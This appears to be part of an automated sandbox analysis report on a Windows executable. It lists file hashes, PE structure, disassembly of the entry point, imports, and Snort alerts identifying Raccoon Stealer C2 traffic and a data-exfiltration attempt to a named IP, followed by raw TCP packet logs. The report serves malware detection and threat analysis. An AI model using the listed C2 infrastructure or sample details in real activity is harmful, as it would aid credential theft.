                                                                                                                                                                                                          Preview: ..........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....M.p.C.m.d.R.u.n.:. .C.o.m.m.a.n.d. .L.i.n.e.:. .".C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.m.p.c.m.d.r.u.n...e.x.e.". .-.w.d.e.n.a.b.l.e..... .S.t.a.r.t. .T.i.m.e.:. .. T.h.u. .. J.u.n. .. 2.7. .. 2.0.1.9. .0.1.:.2.9.:.4.9.........M.p.E.n.s.u.r.e.P.r.o.c.e.s.s.M.i.t.i.g.a.t.i.o.n.P.o.l.i.c.y.:. .h.r. .=. .0.x.1.....W.D.E.n.a.b.l.e.....E.R.R.O.R.:. .M.p.W.D.E.n.a.b.l.e.(.T.R.U.E.). .f.a.i.l.e.d. .(.8.0.0.7.0.4.E.C.).....M.p.C.m.d.R.u.n.:. .E.n.d. .T.i.m.e.:. .. T.h.u. .. J.u.n. .. 2.7. .. 2.0.1.9. .0.1.:.2.9.:.4.9.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.............-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.
                                                                                                                                                                                                          C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\DeliveryOptimization\Logs\dosvc.20220101_032203_728.etl
                                                                                                                                                                                                          Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):8192
                                                                                                                                                                                                          Entropy (8bit):3.391974703064099
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:PC9dPo+ua5m+9k/Y2WCK/I2lhik1/4p1T2djFzaNMC5dJRlj5H:KXN6X92ysvCdp
                                                                                                                                                                                                          MD5:F3DF80AB0056FA91B9D1C6189A8D48AC
                                                                                                                                                                                                          SHA1:A875FF7E8C3F68E0630491278FAAACDDD302B0F1
                                                                                                                                                                                                          SHA-256:193AA88EBC137D516D6CBCE0B7E00AEB5C28B33D387E7E5F409D20CA2F46C678
                                                                                                                                                                                                          SHA-512:5CED1F89A5899467DA2D4D48697577CA7B9A83C61373400E8A05D4BEDDA453530609481E9F31F8263BE5FF382E1D3548BF6428D4C23B0618DD83DE607BBB45BB
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                          Preview: .... ... ....................................... ...!...................................J........................B..............Zb... ... ..........................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1..................................................................... .......P.............8.6.9.6.E.A.C.4.-.1.2.8.8.-.4.2.8.8.-.A.4.E.E.-.4.9.E.E.4.3.1.B.0.A.D.9...C.:.\.W.i.n.d.o.w.s.\.S.e.r.v.i.c.e.P.r.o.f.i.l.e.s.\.N.e.t.w.o.r.k.S.e.r.v.i.c.e.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s.\.D.e.l.i.v.e.r.y.O.p.t.i.m.i.z.a.t.i.o.n.\.L.o.g.s.\.d.o.s.v.c...2.0.2.2.0.1.0.1._.0.3.2.2.0.3._.7.2.8...e.t.l.........P.P.........J.......................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          C:\Windows\SysWOW64\tfktmtml\atingifo.exe (copy)
                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):11656704
                                                                                                                                                                                                          Entropy (8bit):3.598241438885829
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:24576:26SbKFrS57Ybtr0m10000000000000000000000000000000000000000000000n:6
                                                                                                                                                                                                          MD5:1A995C233549FD2389D902B2E1F2413D
                                                                                                                                                                                                          SHA1:A4C51A030E691BAE892E1042FBCC2FD05D3E9C92
                                                                                                                                                                                                          SHA-256:7E890AC9AF0630F04AC9EB1471C694D8682824B31CB8B868E43ECE0E02B0712F
                                                                                                                                                                                                          SHA-512:640EC203A1317D9E64C6ABE6314B42537CC8A6716F68ED64CF301B982A97EBF5484C72DC14E91B2C37F47BA236EA1839C78BFE538FBDC03827B52D46FD7525B4
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........#O..B!.B!.B!.....B!..4...B!..4...B!.:..B!.B .(B!..4..B!..4..B!..4..B!.Rich.B!.................PE..L...d.`......................3.....PK.......0....@.......................... 8.................................................(....p7..N....................7.d"..0...................................@............................................text...6........................... ..`.data....*3..0......................@....vupa........`7.....................@....rsrc....N...p7..P..................@..@.reloc...V....7....................@..B................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                          Static File Info

                                                                                                                                                                                                          General

                                                                                                                                                                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                          Entropy (8bit):6.230155743119187
                                                                                                                                                                                                          TrID:
                                                                                                                                                                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                          • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                          File name:3YzgU3S0nW.exe
                                                                                                                                                                                                          File size:347136
                                                                                                                                                                                                          MD5:720b195655e0a571c4d511088b51202b
                                                                                                                                                                                                          SHA1:f171845fe7b3ae9576ea0f698edd8d65d6bf6ead
                                                                                                                                                                                                          SHA256:eb24b3b9375f0b3272fac6eecc9329f79eab274d802b2ad37037cc83a46fa3f1
                                                                                                                                                                                                          SHA512:fd509b50e86b073a5cd15dbea644bcd96cf6becde8ee8e1c1a3b6433f84d4825cc25cdc4da68d4a5894491de55cab73de1d5e24f3f479bd7459dfd415b93a22b
                                                                                                                                                                                                          SSDEEP:6144:gnjd+ZnJMz+HPYYys+J7huIPCUrM/YbKwj4Fy9FVUHc1FEu:gnjdZz2Qmm7huIPCUQ/YbKwjRFVUwFEu
                                                                                                                                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........#O..B!..B!..B!......B!..4...B!..4...B!..:...B!..B .(B!..4...B!..4...B!..4...B!.Rich.B!.................PE..L....YV_...........

                                                                                                                                                                                                          File Icon

                                                                                                                                                                                                          Icon Hash:a2e8e8e8aaa2a488

                                                                                                                                                                                                          Static PE Info

                                                                                                                                                                                                          General

                                                                                                                                                                                                          Entrypoint:0x424a10
                                                                                                                                                                                                          Entrypoint Section:.text
                                                                                                                                                                                                          Digitally signed:false
                                                                                                                                                                                                          Imagebase:0x400000
                                                                                                                                                                                                          Subsystem:windows gui
                                                                                                                                                                                                          Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                                                                                                                                                          DLL Characteristics:TERMINAL_SERVER_AWARE, NX_COMPAT
                                                                                                                                                                                                          Time Stamp:0x5F5659E6 [Mon Sep 7 16:03:50 2020 UTC]
                                                                                                                                                                                                          TLS Callbacks:
                                                                                                                                                                                                          CLR (.Net) Version:
                                                                                                                                                                                                          OS Version Major:5
                                                                                                                                                                                                          OS Version Minor:1
                                                                                                                                                                                                          File Version Major:5
                                                                                                                                                                                                          File Version Minor:1
                                                                                                                                                                                                          Subsystem Version Major:5
                                                                                                                                                                                                          Subsystem Version Minor:1
                                                                                                                                                                                                          Import Hash:c613013e8ec93eae360257b5231d0949

                                                                                                                                                                                                          Entrypoint Preview

                                                                                                                                                                                                          Instruction
                                                                                                                                                                                                          mov edi, edi
                                                                                                                                                                                                          push ebp
                                                                                                                                                                                                          mov ebp, esp
                                                                                                                                                                                                          call 00007F54B119EA0Bh
                                                                                                                                                                                                          call 00007F54B1192796h
                                                                                                                                                                                                          pop ebp
                                                                                                                                                                                                          ret
                                                                                                                                                                                                          int3
                                                                                                                                                                                                          int3
                                                                                                                                                                                                          int3
                                                                                                                                                                                                          int3
                                                                                                                                                                                                          int3
                                                                                                                                                                                                          int3
                                                                                                                                                                                                          int3
                                                                                                                                                                                                          int3
                                                                                                                                                                                                          int3
                                                                                                                                                                                                          int3
                                                                                                                                                                                                          int3
                                                                                                                                                                                                          int3
                                                                                                                                                                                                          int3
                                                                                                                                                                                                          int3
                                                                                                                                                                                                          int3
                                                                                                                                                                                                          mov edi, edi
                                                                                                                                                                                                          push ebp
                                                                                                                                                                                                          mov ebp, esp
                                                                                                                                                                                                          push FFFFFFFEh
                                                                                                                                                                                                          push 00440C80h
                                                                                                                                                                                                          push 0042B3F0h
                                                                                                                                                                                                          mov eax, dword ptr fs:[00000000h]
                                                                                                                                                                                                          push eax
                                                                                                                                                                                                          add esp, FFFFFF98h
                                                                                                                                                                                                          push ebx
                                                                                                                                                                                                          push esi
                                                                                                                                                                                                          push edi
                                                                                                                                                                                                          mov eax, dword ptr [0044AD00h]
                                                                                                                                                                                                          xor dword ptr [ebp-08h], eax
                                                                                                                                                                                                          xor eax, ebp
                                                                                                                                                                                                          push eax
                                                                                                                                                                                                          lea eax, dword ptr [ebp-10h]
                                                                                                                                                                                                          mov dword ptr fs:[00000000h], eax
                                                                                                                                                                                                          mov dword ptr [ebp-18h], esp
                                                                                                                                                                                                          mov dword ptr [ebp-70h], 00000000h
                                                                                                                                                                                                          lea eax, dword ptr [ebp-60h]
                                                                                                                                                                                                          push eax
                                                                                                                                                                                                          call dword ptr [00401200h]
                                                                                                                                                                                                          cmp dword ptr [00775A08h], 00000000h
                                                                                                                                                                                                          jne 00007F54B1192790h
                                                                                                                                                                                                          push 00000000h
                                                                                                                                                                                                          push 00000000h
                                                                                                                                                                                                          push 00000001h
                                                                                                                                                                                                          push 00000000h
                                                                                                                                                                                                          call dword ptr [004011FCh]
                                                                                                                                                                                                          call 00007F54B1192913h
                                                                                                                                                                                                          mov dword ptr [ebp-6Ch], eax
                                                                                                                                                                                                          call 00007F54B1199DABh
                                                                                                                                                                                                          test eax, eax
                                                                                                                                                                                                          jne 00007F54B119278Ch
                                                                                                                                                                                                          push 0000001Ch
                                                                                                                                                                                                          call 00007F54B11928D0h
                                                                                                                                                                                                          add esp, 04h
                                                                                                                                                                                                          call 00007F54B119B1A8h
                                                                                                                                                                                                          test eax, eax
                                                                                                                                                                                                          jne 00007F54B119278Ch
                                                                                                                                                                                                          push 00000010h
                                                                                                                                                                                                          call 00007F54B11928BDh
                                                                                                                                                                                                          add esp, 04h
                                                                                                                                                                                                          push 00000001h
                                                                                                                                                                                                          call 00007F54B1191B33h
                                                                                                                                                                                                          add esp, 04h
                                                                                                                                                                                                          call 00007F54B119F37Bh
                                                                                                                                                                                                          mov dword ptr [ebp-04h], 00000000h
                                                                                                                                                                                                          call 00007F54B119E42Fh
                                                                                                                                                                                                          test eax, eax

                                                                                                                                                                                                          Rich Headers

                                                                                                                                                                                                          Programming Language:
                                                                                                                                                                                                          • [LNK] VS2010 build 30319
                                                                                                                                                                                                          • [ASM] VS2010 build 30319
                                                                                                                                                                                                          • [ C ] VS2010 build 30319
                                                                                                                                                                                                          • [C++] VS2010 build 30319
                                                                                                                                                                                                          • [RES] VS2010 build 30319
                                                                                                                                                                                                          • [IMP] VS2008 SP1 build 30729

                                                                                                                                                                                                          Data Directories

                                                                                                                                                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x411c40x28.text
                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x3770000x4e90.rsrc
                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x37c0000x2264.reloc
                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x13300x1c.text
                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xa5180x40.text
                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x10000x2b0.text
                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                          Sections

                                                                                                                                                                                                          NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                          .text0x10000x411f60x41200False0.562841140835data6.86803084592IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                          .data0x430000x332a0c0x8c00unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                          .fuhi0x3760000x50x200False0.02734375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                          .rsrc0x3770000x4e900x5000False0.568994140625data5.53838711692IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                          .reloc0x37c0000x56de0x5800False0.313432173295data3.47660251241IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                                                                                          Resources

                                                                                                                                                                                                          NameRVASizeTypeLanguageCountry
                                                                                                                                                                                                          RT_CURSOR0x37a9900x130dataDivehi; Dhivehi; MaldivianMaldives
                                                                                                                                                                                                          RT_CURSOR0x37aad80x8a8dBase III DBT, version number 0, next free block index 40, 1st item "\251\317"Divehi; Dhivehi; MaldivianMaldives
                                                                                                                                                                                                          RT_ICON0x3774b00x8a8dataSpanishColombia
                                                                                                                                                                                                          RT_ICON0x377d580x6c8dataSpanishColombia
                                                                                                                                                                                                          RT_ICON0x3784200x568GLS_BINARY_LSB_FIRSTSpanishColombia
                                                                                                                                                                                                          RT_ICON0x3789880x10a8dataSpanishColombia
                                                                                                                                                                                                          RT_ICON0x379a300x988dataSpanishColombia
                                                                                                                                                                                                          RT_ICON0x37a3b80x468GLS_BINARY_LSB_FIRSTSpanishColombia
                                                                                                                                                                                                          RT_STRING0x37b3980x72dataDivehi; Dhivehi; MaldivianMaldives
                                                                                                                                                                                                          RT_STRING0x37b4100x256dataDivehi; Dhivehi; MaldivianMaldives
                                                                                                                                                                                                          RT_STRING0x37b6680x794dataDivehi; Dhivehi; MaldivianMaldives
                                                                                                                                                                                                          RT_STRING0x37be000x90dataDivehi; Dhivehi; MaldivianMaldives
                                                                                                                                                                                                          RT_ACCELERATOR0x37a8d80x78dataDivehi; Dhivehi; MaldivianMaldives
                                                                                                                                                                                                          RT_ACCELERATOR0x37a8800x58dataDivehi; Dhivehi; MaldivianMaldives
                                                                                                                                                                                                          RT_GROUP_CURSOR0x37aac00x14dataDivehi; Dhivehi; MaldivianMaldives
                                                                                                                                                                                                          RT_GROUP_CURSOR0x37b3800x14dataDivehi; Dhivehi; MaldivianMaldives
                                                                                                                                                                                                          RT_GROUP_ICON0x37a8200x5adataSpanishColombia
                                                                                                                                                                                                          None0x37a9600xadataDivehi; Dhivehi; MaldivianMaldives
                                                                                                                                                                                                          None0x37a9700xadataDivehi; Dhivehi; MaldivianMaldives
                                                                                                                                                                                                          None0x37a9500xadataDivehi; Dhivehi; MaldivianMaldives
                                                                                                                                                                                                          None0x37a9800xadataDivehi; Dhivehi; MaldivianMaldives

                                                                                                                                                                                                          Imports

                                                                                                                                                                                                          DLLImport
                                                                                                                                                                                                          KERNEL32.dllCallNamedPipeA, TerminateProcess, GetExitCodeProcess, GetVersionExW, VerifyVersionInfoW, GetConsoleCP, GetConsoleAliasesLengthA, VerLanguageNameA, VerifyVersionInfoA, FreeEnvironmentStringsW, GetProcessPriorityBoost, SetVolumeMountPointA, GetLongPathNameW, CopyFileA, TlsSetValue, GetConsoleCursorInfo, SystemTimeToTzSpecificLocalTime, FindAtomW, ReleaseMutex, GetNamedPipeHandleStateA, CommConfigDialogA, BuildCommDCBAndTimeoutsW, GetProcAddress, LoadLibraryA, GlobalAlloc, LocalReAlloc, GetCommandLineA, InterlockedExchange, GetCalendarInfoW, DeleteFileA, CreateActCtxA, SetPriorityClass, GetPrivateProfileIntA, GetProcessHeap, GlobalMemoryStatus, ReadConsoleOutputCharacterA, GetStartupInfoA, GetDiskFreeSpaceExW, GetCPInfoExW, GetWindowsDirectoryW, GetSystemWow64DirectoryA, SetLastError, GetProfileStringA, GetCalendarInfoA, FreeUserPhysicalPages, GetTickCount, GetStringTypeExA, DebugBreak, lstrcmpA, WriteFile, SetConsoleMode, GetCurrentThreadId, lstrcatW, SetMailslotInfo, LocalFileTimeToFileTime, DefineDosDeviceA, EndUpdateResourceA, WriteConsoleW, SetSystemTimeAdjustment, GetPrivateProfileSectionW, WritePrivateProfileSectionW, TryEnterCriticalSection, GetPrivateProfileStructW, GetFileAttributesExA, HeapUnlock, PeekConsoleInputA, SetTapeParameters, FindResourceExW, GetLocalTime, CreateIoCompletionPort, CreateSemaphoreA, GetThreadLocale, SetFileShortNameW, lstrcpyA, LockFileEx, GetConsoleAliasA, GetConsoleAliasExesLengthA, TransactNamedPipe, GetDevicePowerState, GetWriteWatch, FreeEnvironmentStringsA, GetConsoleScreenBufferInfo, LoadLibraryW, TlsAlloc, GetComputerNameW, HeapFree, GetLastError, GlobalReAlloc, SignalObjectAndWait, CancelDeviceWakeupRequest, FindClose, SetWaitableTimer, ChangeTimerQueueTimer, GetProcessTimes, FatalAppExitW, lstrcpynA, SetNamedPipeHandleState, FillConsoleOutputCharacterA, GetCompressedFileSizeA, FindNextVolumeMountPointA, GetFullPathNameA, FreeResource, UnlockFile, GlobalAddAtomA, TerminateJobObject, QueryDosDeviceA, EnterCriticalSection, Process32FirstW, SetCurrentDirectoryW, GetBinaryTypeA, OpenMutexA, WideCharToMultiByte, InterlockedIncrement, InterlockedDecrement, GetStringTypeW, MultiByteToWideChar, InterlockedCompareExchange, InitializeCriticalSection, DeleteCriticalSection, LeaveCriticalSection, EncodePointer, DecodePointer, HeapValidate, IsBadReadPtr, RtlUnwind, RaiseException, GetCommandLineW, HeapSetInformation, GetStartupInfoW, LCMapStringW, GetCPInfo, GetModuleFileNameW, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, InitializeCriticalSectionAndSpinCount, IsProcessorFeaturePresent, HeapAlloc, GetModuleFileNameA, HeapReAlloc, HeapSize, HeapQueryInformation, HeapCreate, GetACP, GetOEMCP, IsValidCodePage, TlsGetValue, TlsFree, GetModuleHandleW, ExitProcess, SetHandleCount, GetStdHandle, GetFileType, QueryPerformanceCounter, GetCurrentProcessId, GetSystemTimeAsFileTime, GetEnvironmentStringsW, GetLocaleInfoW, GetLocaleInfoA, IsValidLocale, EnumSystemLocalesA, GetUserDefaultLCID, OutputDebugStringA, OutputDebugStringW, SetFilePointer, GetConsoleMode, SetStdHandle, FlushFileBuffers, CreateFileW, CloseHandle

                                                                                                                                                                                                          Possible Origin

                                                                                                                                                                                                          Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                          Divehi; Dhivehi; MaldivianMaldives
                                                                                                                                                                                                          SpanishColombia

                                                                                                                                                                                                          Network Behavior

                                                                                                                                                                                                          Snort IDS Alerts

                                                                                                                                                                                                          TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                                                                                          12/31/21-19:22:47.236332ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.38.8.8.8
                                                                                                                                                                                                          12/31/21-19:22:55.201888ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.38.8.8.8
                                                                                                                                                                                                          12/31/21-19:24:09.583130TCP2033973ET TROJAN Win32.Raccoon Stealer CnC Activity (dependency download)4986180192.168.2.3185.163.204.24
                                                                                                                                                                                                          12/31/21-19:24:10.642506TCP2033973ET TROJAN Win32.Raccoon Stealer CnC Activity (dependency download)4986180192.168.2.3185.163.204.24
                                                                                                                                                                                                          12/31/21-19:24:11.651104TCP2033974ET TROJAN Win32.Raccoon Stealer Data Exfil Attempt4986180192.168.2.3185.163.204.24

                                                                                                                                                                                                          Network Port Distribution

                                                                                                                                                                                                          TCP Packets

                                                                                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                          Dec 31, 2021 19:22:40.543875933 CET4974480192.168.2.331.28.27.130
                                                                                                                                                                                                          Dec 31, 2021 19:22:40.592716932 CET804974431.28.27.130192.168.2.3
                                                                                                                                                                                                          Dec 31, 2021 19:22:40.592883110 CET4974480192.168.2.331.28.27.130
                                                                                                                                                                                                          Dec 31, 2021 19:22:40.592971087 CET4974480192.168.2.331.28.27.130
                                                                                                                                                                                                          Dec 31, 2021 19:22:40.594021082 CET4974480192.168.2.331.28.27.130
                                                                                                                                                                                                          Dec 31, 2021 19:22:40.643419027 CET804974431.28.27.130192.168.2.3
                                                                                                                                                                                                          Dec 31, 2021 19:22:40.644064903 CET804974431.28.27.130192.168.2.3
                                                                                                                                                                                                          Dec 31, 2021 19:22:40.674894094 CET804974431.28.27.130192.168.2.3
                                                                                                                                                                                                          Dec 31, 2021 19:22:40.674932003 CET804974431.28.27.130192.168.2.3
                                                                                                                                                                                                          Dec 31, 2021 19:22:40.675010920 CET4974480192.168.2.331.28.27.130
                                                                                                                                                                                                          Dec 31, 2021 19:22:40.676506996 CET4974480192.168.2.331.28.27.130
                                                                                                                                                                                                          Dec 31, 2021 19:22:40.708400965 CET4974580192.168.2.331.28.27.130
                                                                                                                                                                                                          Dec 31, 2021 19:22:40.725480080 CET804974431.28.27.130192.168.2.3
                                                                                                                                                                                                          Dec 31, 2021 19:22:40.757443905 CET804974531.28.27.130192.168.2.3
                                                                                                                                                                                                          Dec 31, 2021 19:22:40.757589102 CET4974580192.168.2.331.28.27.130
                                                                                                                                                                                                          Dec 31, 2021 19:22:40.757766962 CET4974580192.168.2.331.28.27.130
                                                                                                                                                                                                          Dec 31, 2021 19:22:40.757786036 CET4974580192.168.2.331.28.27.130
                                                                                                                                                                                                          Dec 31, 2021 19:22:40.808584929 CET804974531.28.27.130192.168.2.3
                                                                                                                                                                                                          Dec 31, 2021 19:22:40.808608055 CET804974531.28.27.130192.168.2.3
                                                                                                                                                                                                          Dec 31, 2021 19:22:40.838114023 CET804974531.28.27.130192.168.2.3
                                                                                                                                                                                                          Dec 31, 2021 19:22:40.838268042 CET804974531.28.27.130192.168.2.3
                                                                                                                                                                                                          Dec 31, 2021 19:22:40.838326931 CET4974580192.168.2.331.28.27.130
                                                                                                                                                                                                          Dec 31, 2021 19:22:40.839684963 CET4974580192.168.2.331.28.27.130
                                                                                                                                                                                                          Dec 31, 2021 19:22:40.871489048 CET4974680192.168.2.331.28.27.130
                                                                                                                                                                                                          Dec 31, 2021 19:22:40.890605927 CET804974531.28.27.130192.168.2.3
                                                                                                                                                                                                          Dec 31, 2021 19:22:40.920352936 CET804974631.28.27.130192.168.2.3
                                                                                                                                                                                                          Dec 31, 2021 19:22:40.920473099 CET4974680192.168.2.331.28.27.130
                                                                                                                                                                                                          Dec 31, 2021 19:22:40.920555115 CET4974680192.168.2.331.28.27.130
                                                                                                                                                                                                          Dec 31, 2021 19:22:40.985121012 CET804974631.28.27.130192.168.2.3
                                                                                                                                                                                                          Dec 31, 2021 19:22:40.985173941 CET804974631.28.27.130192.168.2.3
                                                                                                                                                                                                          Dec 31, 2021 19:22:40.985203981 CET804974631.28.27.130192.168.2.3
                                                                                                                                                                                                          Dec 31, 2021 19:22:40.985244989 CET804974631.28.27.130192.168.2.3
                                                                                                                                                                                                          Dec 31, 2021 19:22:40.985285997 CET804974631.28.27.130192.168.2.3
                                                                                                                                                                                                          Dec 31, 2021 19:22:40.985323906 CET804974631.28.27.130192.168.2.3
                                                                                                                                                                                                          Dec 31, 2021 19:22:40.985335112 CET4974680192.168.2.331.28.27.130
                                                                                                                                                                                                          Dec 31, 2021 19:22:40.985364914 CET804974631.28.27.130192.168.2.3
                                                                                                                                                                                                          Dec 31, 2021 19:22:40.985408068 CET804974631.28.27.130192.168.2.3
                                                                                                                                                                                                          Dec 31, 2021 19:22:40.985416889 CET4974680192.168.2.331.28.27.130
                                                                                                                                                                                                          Dec 31, 2021 19:22:40.985450029 CET804974631.28.27.130192.168.2.3
                                                                                                                                                                                                          Dec 31, 2021 19:22:40.985480070 CET4974680192.168.2.331.28.27.130
                                                                                                                                                                                                          Dec 31, 2021 19:22:40.985506058 CET804974631.28.27.130192.168.2.3
                                                                                                                                                                                                          Dec 31, 2021 19:22:40.985564947 CET4974680192.168.2.331.28.27.130
                                                                                                                                                                                                          Dec 31, 2021 19:22:41.034195900 CET804974631.28.27.130192.168.2.3
                                                                                                                                                                                                          Dec 31, 2021 19:22:41.034244061 CET804974631.28.27.130192.168.2.3
                                                                                                                                                                                                          Dec 31, 2021 19:22:41.034281969 CET804974631.28.27.130192.168.2.3
                                                                                                                                                                                                          Dec 31, 2021 19:22:41.034315109 CET804974631.28.27.130192.168.2.3
                                                                                                                                                                                                          Dec 31, 2021 19:22:41.034354925 CET804974631.28.27.130192.168.2.3
                                                                                                                                                                                                          Dec 31, 2021 19:22:41.034388065 CET804974631.28.27.130192.168.2.3
                                                                                                                                                                                                          Dec 31, 2021 19:22:41.034399986 CET4974680192.168.2.331.28.27.130
                                                                                                                                                                                                          Dec 31, 2021 19:22:41.034416914 CET804974631.28.27.130192.168.2.3
                                                                                                                                                                                                          Dec 31, 2021 19:22:41.034435987 CET4974680192.168.2.331.28.27.130
                                                                                                                                                                                                          Dec 31, 2021 19:22:41.034442902 CET804974631.28.27.130192.168.2.3
                                                                                                                                                                                                          Dec 31, 2021 19:22:41.034461021 CET4974680192.168.2.331.28.27.130
                                                                                                                                                                                                          Dec 31, 2021 19:22:41.034467936 CET804974631.28.27.130192.168.2.3
                                                                                                                                                                                                          Dec 31, 2021 19:22:41.034492970 CET804974631.28.27.130192.168.2.3
                                                                                                                                                                                                          Dec 31, 2021 19:22:41.034516096 CET4974680192.168.2.331.28.27.130
                                                                                                                                                                                                          Dec 31, 2021 19:22:41.034518003 CET804974631.28.27.130192.168.2.3
                                                                                                                                                                                                          Dec 31, 2021 19:22:41.034542084 CET804974631.28.27.130192.168.2.3
                                                                                                                                                                                                          Dec 31, 2021 19:22:41.034560919 CET4974680192.168.2.331.28.27.130
                                                                                                                                                                                                          Dec 31, 2021 19:22:41.034574986 CET804974631.28.27.130192.168.2.3
                                                                                                                                                                                                          Dec 31, 2021 19:22:41.034599066 CET4974680192.168.2.331.28.27.130
                                                                                                                                                                                                          Dec 31, 2021 19:22:41.034609079 CET804974631.28.27.130192.168.2.3
                                                                                                                                                                                                          Dec 31, 2021 19:22:41.034642935 CET804974631.28.27.130192.168.2.3
                                                                                                                                                                                                          Dec 31, 2021 19:22:41.034663916 CET4974680192.168.2.331.28.27.130
                                                                                                                                                                                                          Dec 31, 2021 19:22:41.034678936 CET804974631.28.27.130192.168.2.3
                                                                                                                                                                                                          Dec 31, 2021 19:22:41.034712076 CET804974631.28.27.130192.168.2.3
                                                                                                                                                                                                          Dec 31, 2021 19:22:41.034730911 CET4974680192.168.2.331.28.27.130
                                                                                                                                                                                                          Dec 31, 2021 19:22:41.034746885 CET804974631.28.27.130192.168.2.3
                                                                                                                                                                                                          Dec 31, 2021 19:22:41.034799099 CET4974680192.168.2.331.28.27.130
                                                                                                                                                                                                          Dec 31, 2021 19:22:41.035056114 CET804974631.28.27.130192.168.2.3
                                                                                                                                                                                                          Dec 31, 2021 19:22:41.035094023 CET804974631.28.27.130192.168.2.3
                                                                                                                                                                                                          Dec 31, 2021 19:22:41.035146952 CET4974680192.168.2.331.28.27.130
                                                                                                                                                                                                          Dec 31, 2021 19:22:41.084284067 CET804974631.28.27.130192.168.2.3
                                                                                                                                                                                                          Dec 31, 2021 19:22:41.084358931 CET804974631.28.27.130192.168.2.3
                                                                                                                                                                                                          Dec 31, 2021 19:22:41.084413052 CET804974631.28.27.130192.168.2.3
